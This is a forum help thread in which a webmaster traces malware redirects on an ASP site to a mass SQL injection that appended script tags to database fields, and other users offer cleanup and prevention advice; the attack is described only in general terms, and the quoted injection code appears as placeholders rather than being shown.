[Okta Webinar] Learn how to a build a cloud-first strategyRegister Now

x
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 541
  • Last Modified:

Hacked website or something else?

I have  a website that is ASP based.
As of yesturday whe someone goes on to the site and does a query (looks up informaiton) the site starts to do some sort of redirection and trys to load a virus on the client PC.

I took the site offline, formatted the server, reloaded windows 2003.  

I restored a copy of the site from a week ago,prior to anything going on.
The server is patched 100% and AV is installed.

I put the site back up and went to the page and bam, same issue.  I am stumped.

We have a windows 2003 server behind a cisco firewall and a MS SQL server that the website talks to.  Any ideas how I can get ahead of this?

thanks
0
lefty431
Asked:
lefty431
  • 5
  • 3
  • 2
  • +2
3 Solutions
 
debuggerauCommented:
how do you know its a sql injection hack, usually the sql backend is not web accessible...

Has the server been hardened?
Best practices on IIS?

Complex non human passwords?
Limited accounts?

>20 Char admin password?

Have you got an infected backup that can be checked?
0
 
lefty431Author Commented:
Yes to all of your questions.
15 char admin password not 20.  It could be a cross hack too. which in reading it sounds more like the case.   how do you get rid of it?
0
 
Dozer42Commented:
Yep, it's been hacked.

Compare the source code or at least filesizes of the web page that you originally uploaded to the server with what is there now. Find the infection and kill it. (Or check it against archives, you do have backups, right?)

When you say 'AV is installed', I'm guessing you're talking about one of the worthless mass market products like Norton, McAfee, etc.

Try something a bit more powerful like ESET's NOD32 or Kaspersky.

But even they might have trouble finding a virus directly embedded into ASP code, as it's not an 'everyday' infection. At least they do have 'intelligent' heurestic scanning engines that could pick the virus up even if it's unknown or a variant of some other virus.

If those two programs can't find the infection, feel free to send those companies a copy of your website directory structure and files, and have them comb through it manually.

These guys are good. Very good, and they will find it.

Or just toss this Microsoft garbage in the trash where it belongs and run a secure Linux variant. =)

We've been running Linux on our servers for 15 years now. Never had a server hacked, never had a page compromised except for spammers using an insecure Forms.Pl script that someone uploaded and used on their webpage.

Good luck sir.

You will beat this.
0
Cyber Threats to Small Businesses (Part 1)

This past May, Webroot surveyed more than 600 IT decision-makers at medium-sized companies to see how these small businesses perceived new threats facing their organizations.  Read what Webroot CISO, Gary Hayslip, has to say about the survey in part 1 of this 2-part blog series.

 
r-kCommented:
Good advice from Dozer42 but I don't think you need to anything so drastic as switching platforms to solve this problem...

From the description it seems like your backup may also be infected, so I would start with restoring an even older backup.

I posted some other tips in your other thread that seems on the same topic:

 http://www.experts-exchange.com/Software/Server_Software/Web_Servers/Microsoft_IIS/Q_23478167.html

Good luck.
0
 
jahboiteCommented:
If it were SQL injection, then the html that performs the redirections/loads iframe will be in the SQL database, your asp code will be unaffected.
Maybe you should check there.
0
 
lefty431Author Commented:
where in SQL?  Any ideas
0
 
lefty431Author Commented:
dude your a genious
0
 
r-kCommented:
That's great. Were you able to find the problem?
0
 
lefty431Author Commented:
I found the database table that had all of the bad code..  I don't know what to look for in the ASP that would show the hole or how they got the exploit...

any ideas on that.
0
 
jahboiteCommented:
Recent SQL injection against MS SQL involves sending a query that contains statements to determine fields in tables that can have text appended to them and to append a string to those fields for all rows.  You may find <iframe> tags in these fields.
An example of  HTTP request parameters to perform the attack can be found here:
http://www.sophos.com/security/blog/2008/04/1329.html?_log_from=rss
http://www.secureworks.com/research/blog/index.php/2008/06/04/new-round-of-mass-sql-injections/
http://www.secureworks.com/research/threats/danmecasprox/?threat=danmecasprox

and as you can see, the request includes DECLARE and CAST statements which might help you to find both entries in your web access logs and in your SQL transactions.

Shadowserver has a list of domains used for hosting the malware which might also help you find stuff in your tables (this list is a bit old now, but it's probably worth a look):
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514

A lot of other people who use EE have had problems with SQL injections and it's worth searching for some of the questions for more information on how to prevent the attacks:
http://www.experts-exchange.com/Security/Vulnerabilities/Q_23411125.html
http://www.experts-exchange.com/Microsoft/Development/MS-SQL-Server/Q_23422326.html
http://www.experts-exchange.com/Microsoft/Development/MS-SQL-Server/Q_23427846.html
http://www.experts-exchange.com/Security/Misc/Q_23391099.html
http://www.experts-exchange.com/Security/Vulnerabilities/Q_23381980.html

This little lot should at least help you to identify whether this is indeed what happened to you and what you can do about it if it was.
Good Luck!

0
 
jahboiteCommented:
Bit of a lag there! Glad you found the table.
You're looking for asp code that takes input from the client (forms with POST or GET methods) or takes input from the HTTP request parameters (usually the GET method).  It then uses the input in forming a SQL statement.
Tolomir pointed to some info on how to prevent SQL injection in this post:
http://www.experts-exchange.com/Security/Vulnerabilities/Q_23411125.html
One of the links was this very handy article:
http://msdn.microsoft.com/en-us/library/ms998271.aspx
and you might be interested in URLscan:
http://technet.microsoft.com/en-gb/security/cc242650.aspx
0
 
lefty431Author Commented:
this is from the website..
Malicious SQL injection

We have blogged a few times recently about a fairly widespread and aggressive attack used to compromise web pages by inserting a malicious script tag (which loads a malicious script from a remote site) [1,2,3]. Aside from the usual plethora of small site victims, the attack has had notable success against several quite well known targets.

Last week, some interesting information was posted to the SANS Handlers Diary [4]. Whilst investigating some malicious files, the tool used by the attackers to identify and attack vulnerable web servers was found. The tool provides a simple interface in order to perform SQL injection attacks against sites identified via a Google query.

This morning, I was investigating another attack that is most likely related. The target of the malicious script tag has changed, but the underlying malicious SQL is very similar. The malicious injection can be seen below:

[Dump of the malicious SQL injection]

As you can see, the main guts of the malicious SQL (within @S) are obfuscated within the CAST(0x&) block (which is trimmed for clarity). Decryption is trivial, enabling us to identify how the attack works.

[Decrypted SQL]

In brief, the SQL will concatenate a malicious script tag into all (n)text and (n)varchar fields of all user tables in the MS SQL database. Nasty. Particularly for webmasters who have been hit, leaving them with a cumbersome cleanup process, and the challenge of preventing the same attack hitting them again.

And the purpose of the attack? Feeding the 1.js file into our automation system, we see a whole mass of pages that will get loaded as a result of browsing a compromised page. This is represented in the flowchart below (click to enlarge):

    * yellow blob: malicious 1.js file loaded from compromised pages
    * green arrows: page loads via an iframe (or similar)
    * red arrows: exploit payload, in this case resulting in the download of some Win32 malware


this clearly looks like the issue...  what do you think I should search for on the web pages?

I am not a web programmer, but I can hash through the code.
0

Featured Post

2017 Webroot Threat Report

MSPs: Get the facts you need to protect your clients.
The 2017 Webroot Threat Report provides a uniquely insightful global view into the analysis and discoveries made by the Webroot® Threat Intelligence Platform to provide insights on key trends and risks as seen by our users.

  • 5
  • 3
  • 2
  • +2
Tackle projects and never again get stuck behind a technical roadblock.
Join Now